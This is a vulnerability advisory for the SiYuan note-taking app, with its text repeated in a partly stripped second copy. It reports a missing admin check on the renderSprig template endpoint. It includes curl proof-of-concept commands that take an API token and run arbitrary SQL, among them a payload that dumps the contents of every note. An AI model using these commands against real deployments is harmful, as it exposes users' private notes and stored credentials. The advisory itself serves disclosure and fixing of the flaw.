Summary
POST /api/template/renderSprig lacks model.CheckAdminRole, allowing any authenticated user to execute arbitrary SQL queries against the SiYuan workspace database and exfiltrate all note content, metadata, and custom attributes.
Details
File: kernel/api/router.go
Every sensitive endpoint in the codebase uses model.CheckAuth + model.CheckAdminRole, but renderSprig only has CheckAuth:
// Missing CheckAdminRole
ginServer.Handle("POST", "/api/template/renderSprig",
model.CheckAuth, renderSprig)
// Correct pattern used by all other data endpoints
ginServer.Handle("POST", "/api/template/render",
model.CheckAuth, model.CheckAdminRole, model.CheckReadonly, renderTemplate)renderSprig calls model.RenderGoTemplate (kernel/model/template.go) which registers SQL functions from kernel/sql/database.go:
(*templateFuncMap)["querySQL"] = func(stmt string) (ret []map[string]interface{}) {
ret, _ = Query(stmt, 1024) // executes raw SELECT, no role check
return
}Any authenticated user - including Publish Service Reader role accounts - can call this endpoint and execute arbitrary SELECT queries.
PoC
Environment:
docker run -d --name siyuan -p 6806:6806 \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
Exploit:
# Step 1: Login and retrieve API token
curl -s -X POST http://localhost:6806/api/system/loginAuth \
-H "Content-Type: application/json" \
-d '{"authCode":"test123"}' -c /tmp/siy.cookie
sleep 15 # wait for boot
TOKEN=$(curl -s -X POST http://localhost:6806/api/system/getConf \
-b /tmp/siy.cookie -H "Content-Type: application/json" -d '{}' \
| python3 -c "import sys,json; print(json.load(sys.stdin)['data']['conf']['api']['token'])")
# Step 2: Execute SQL as non-admin user
curl -s -X POST http://localhost:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{querySQL \"SELECT count(*) as n FROM blocks\" | toJson}}"}'Confirmed response on v3.6.0:
{"code":0,"msg":"","data":"[{\"n\":0}]"}Full note dump:
curl -s -X POST http://localhost:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{range $r := (querySQL \"SELECT hpath,content FROM blocks LIMIT 100\")}}{{$r.hpath}}: {{$r.content}}\n{{end}}"}'Impact
Any authenticated user (API token holder, Publish Service Reader) can:
- Dump all note content and document hierarchy from the workspace
- Exfiltrate tags, custom attributes, block IDs, and timestamps
- Search notes for stored passwords, API keys, or personal data
- Enumerate all notebooks and their structure
This is especially severe in shared or enterprise deployments where lower-privilege accounts should not have access to other users' notes.
Summary
POST /api/template/renderSpriglacksmodel.CheckAdminRole, allowing any authenticated user to execute arbitrary SQL queries against the SiYuan workspace database and exfiltrate all note content, metadata, and custom attributes.Details
File:
kernel/api/router.goEvery sensitive endpoint in the codebase uses
model.CheckAuth + model.CheckAdminRole, butrenderSprigonly hasCheckAuth:renderSprigcallsmodel.RenderGoTemplate(kernel/model/template.go) which registers SQL functions fromkernel/sql/database.go:Any authenticated user - including Publish Service Reader role accounts - can call this endpoint and execute arbitrary SELECT queries.
PoC
Environment:
docker run -d --name siyuan -p 6806:6806 \ -v $(pwd)/workspace:/siyuan/workspace \ b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123Exploit:
Confirmed response on v3.6.0:
{"code":0,"msg":"","data":"[{\"n\":0}]"}Full note dump:
Impact
Any authenticated user (API token holder, Publish Service Reader) can:
This is especially severe in shared or enterprise deployments where lower-privilege accounts should not have access to other users' notes.